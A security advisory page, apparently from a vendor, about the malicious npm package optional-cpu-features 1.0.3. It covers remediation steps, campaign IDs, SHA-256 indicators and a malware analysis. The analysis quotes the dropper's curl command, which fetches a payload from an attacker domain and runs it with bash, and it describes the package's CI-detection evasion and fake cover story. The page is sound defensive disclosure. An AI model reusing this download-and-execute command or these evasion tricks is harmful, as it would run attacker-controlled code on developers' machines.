Which versions of optional-cpu-features are malicious?

The following npm versions of optional-cpu-features are flagged malicious: 1.0.3. Treat any of these as compromised.

How do I remediate optional-cpu-features if I installed it?

Remove optional-cpu-features from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is optional-cpu-features part of a known attack campaign?

Yes — optional-cpu-features is associated with the IN-MAL-2026-005737, IN-MAL-2026-005738 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect optional-cpu-features in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking optional-cpu-features and packages like it before any post-install script runs.

Malicious package

optional-cpu-featuresnpm

Malicious code in optional-cpu-features (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5642

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall optional-cpu-features

What this malware does

On npm install, both the install and postinstall lifecycle scripts run node install.js, which requires lib/sync.js. That file hardcodes BASE = "https://api.aavcareer.ink" and spawns a detached, stdio-suppressed shell that runs curl -ks ${BASE}/upd_m -o /var/tmp/upd_m && bash /var/tmp/upd_m on Unix (or fetches /upd_w to %TEMP%\upd_w.cmd and executes it on Windows). The fetch disables TLS certificate verification (curl -ks) and the spawn is detached + unref'd to hide from the install log. install.js early-exits with process.exit(0) when process.env.CI is "true" or "1", so CI scanners and sandboxes see a no-op while real developer and build machines execute the remote payload. The package name and the package.json description ("Optional native CPU feature probe for toolchain compatibility (install is a no-op when bindings are unavailable)") advertise a CPU/SIMD feature probe, but no CPU detection code exists anywhere in the package — the cover story exists to encourage monorepos to add this as an optionalDependencies entry that tolerates apparent failure while the dropper has already succeeded silently. The attacker fully controls the bytes that run as the installing user on every non-CI machine.

Malicious versions

1 flagged

1.0.3

Indicators of compromise (SHA-256)

4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e

83f5bd807e50ab6d644f7770c01e7da5560da2b603106cb18b08a12d92b6c441

Frequently asked questions

No. optional-cpu-features on npm has been identified as a malicious package (version 1.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005737IN-MAL-2026-005738

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection